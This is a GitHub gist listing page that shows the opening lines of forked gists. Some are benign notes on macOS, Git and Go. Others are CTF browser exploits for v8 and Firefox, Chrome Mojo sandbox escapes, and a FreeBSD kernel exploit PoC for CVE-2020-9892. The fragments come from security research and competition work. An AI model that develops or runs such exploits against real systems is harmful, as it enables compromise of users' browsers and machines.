Skip to content

Instantly share code, notes, and snippets.

View shxdow's full-sized avatar

shxdow

46 followers · 107 following
View GitHub Profile
@shxdow
shxdow / MacOS Screen sharing on localhost only.md
Created May 24, 2023 11:57 — forked from mhofman/MacOS Screen sharing on localhost only.md
MacOS ScreenSharing on localhost only

Force recent MacOS to listen for screen sharing on localhost only, keeping SIP on

All the following has been validated on MacOS Mojave 10.14.6

Problems

While there is a command line preference to accept only local VNC connections, that setting still doesn't prevent the daemon from listening to the wildcard address, and advertise the service on Bonjour. I haven't actually tried to see if it restricted anything in modern versions of the operating system, but here it is for reference:

sudo defaults write /Library/Preferences/com.apple.RemoteManagement.plist VNCOnlyLocalConnections -bool yes
@shxdow
shxdow / git-commit-template.md
Created May 6, 2023 22:44 — forked from lisawolderiksen/git-commit-template.md
Use a Git commit message template to write better commit messages

Using Git Commit Message Templates to Write Better Commit Messages

The always enthusiastic and knowledgeable mr. @jasaltvik shared with our team an article on writing (good) Git commit messages: How to Write a Git Commit Message. This excellent article explains why good Git commit messages are important, and explains what constitutes a good commit message. I wholeheartedly agree with what @cbeams writes in his article. (Have you read it yet? If not, go read it now. I'll wait.) It's sensible stuff. So I decided to start following the

@shxdow
shxdow / simplevm.c
Created February 20, 2023 10:04 — forked from imbushuo/simplevm.c
Demonstrates Hypervisor.Framework usage in Apple Silicon
// simplevm.c: demonstrates Hypervisor.Framework usage in Apple Silicon
// Based on the work by @zhuowei
// @imbushuo - Nov 2020
// To build:
// Prepare the entitlement with BOTH com.apple.security.hypervisor and com.apple.vm.networking WHEN SIP IS OFF
// Prepare the entitlement com.apple.security.hypervisor and NO com.apple.vm.networking WHEN SIP IS ON
// ^ Per @never_released, tested on 11.0.1, idk why
// clang -o simplevm -O2 -framework Hypervisor -mmacosx-version-min=11.0 simplevm.c
// codesign --entitlements simplevm.entitlements --force -s - simplevm
@shxdow
shxdow / index.html
Created April 19, 2022 23:04 — forked from hkraw/index.html
GoogleCtf 2021 fullchain
<html>
<head>
<title>google-ctf fullchain</title>
</head>
<body>
<h1>HK</h1>
<pre id='log'></pre>
</body>
<script src='./mojo/mojo_bindings.js'></script>
<script src="./mojo/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
@shxdow
shxdow / corctf_outfoxed.md
Created April 19, 2022 23:03 — forked from hkraw/corctf_outfoxed.md
first firefox pwn

outfoxed exp (First Blood)

let pwn = async function() {
  /* Helpers */
  let conversionBuffer = new ArrayBuffer(0x40)
  let floatView = new Float64Array(conversionBuffer)
  let intView = new BigUint64Array(conversionBuffer)

  BigInt.prototype.i2f = function() {
    intView[0] = this
@shxdow
shxdow / should've_had_a_v8_exploit.md
Created April 19, 2022 23:03 — forked from hkraw/should've_had_a_v8_exploit.md
UIUCTF-2021

Exploit (First blood)

let wasm_code = new Uint8Array([
  0, 97,115,109,  1,  0,  0,  0,  1,133,128,128,128,  0,
  1, 96,  0,  1,127,  3,130,128,128,128,  0,  1,  0,  4,
  132,128,128,128,  0,  1,112,  0,  0,  5,131,128,128,128,
  0,  1,  0,  1,  6,129,128,128,128,  0,  0,  7,145,128,
  128,128,  0,2,6,109,101,109,111,114,121,2,0,4,109,97,
  105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
  0,65,42,11
@shxdow
shxdow / 0ctf2020-fullchain++-cfi.html
Created April 19, 2022 23:02 — forked from hkraw/0ctf2020-fullchain++-cfi.html
<html>
<head>
<title>0ctf sbx</title>
</head>
<body>
<h1>HK</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./mojo_js/third_party/blink/public/mojom/tstorage/tstorage.mojom.js'></script>
@shxdow
shxdow / redpwn-empires.html
Created April 19, 2022 23:02 — forked from hkraw/redpwn-empires.html
<html>
<head>
<title>RedPwn sbx-1</title>
</head>
<body>
<h1>:thonk:</h1>
<pre id='log'></pre>
</body>
<script src='./mojo_bindings.js'></script>
<script src='./third_party/blink/public/mojom/desert.mojom.js'></script>
@shxdow
shxdow / ip6_expl_poc.c
Created April 11, 2021 11:15 — forked from Cryptogenic/ip6_expl_poc.c
Kernel exploit POC (Proof-of-Concept) for IP6_EXTHDR_CHECK double free (CVE-2020-9892). Interleaves with multi-threads for code exec. Mainly a reference for PS4 implementation.
/*
* IP6_EXTHDR_CHECK Double Free (CVE-2020-9892) Exploit PoC for FreeBSD 9.0
* https://github.com/google/security-research/security/advisories/GHSA-gxcr-cw4q-9q78
* -
* Bug credit: Andy Nguyen (@theflow0)
* Exploit credit: @SpecterDev, @tihmstar
* Thanks: @sleirsgoevy, @littlelailo, flatz (@flat_z), @balika011
* -
* Build: gcc -o expl ip6_expl_poc.c -pthread
* -
@shxdow
shxdow / go_io-read_packages.md
Created February 19, 2021 17:37 — forked from suntong/go_io-read_packages.md
[go-nuts] Differences between os, io, ioutils, bufio, bytes (with Buffer type) packages for file reading

http://grokbase.com/t/gg/golang-nuts/142spmv4fe/go-nuts-differences-between-os-io-ioutils-bufio-bytes-with-buffer-type-packages-for-file-reading

I'm quite confused as there seems to be multiple redundant ways to solve my problem (read a file, parse the content, serve it via http). Most people on stackoverflow would use bufio, but I just can't get the differences between this package and the Buffer type of bytes and just reading a file with the os methods. Also I don't know when and why I should choose those ways to do it, when I have the simple, but non-versatile, ioutils.ReadFile.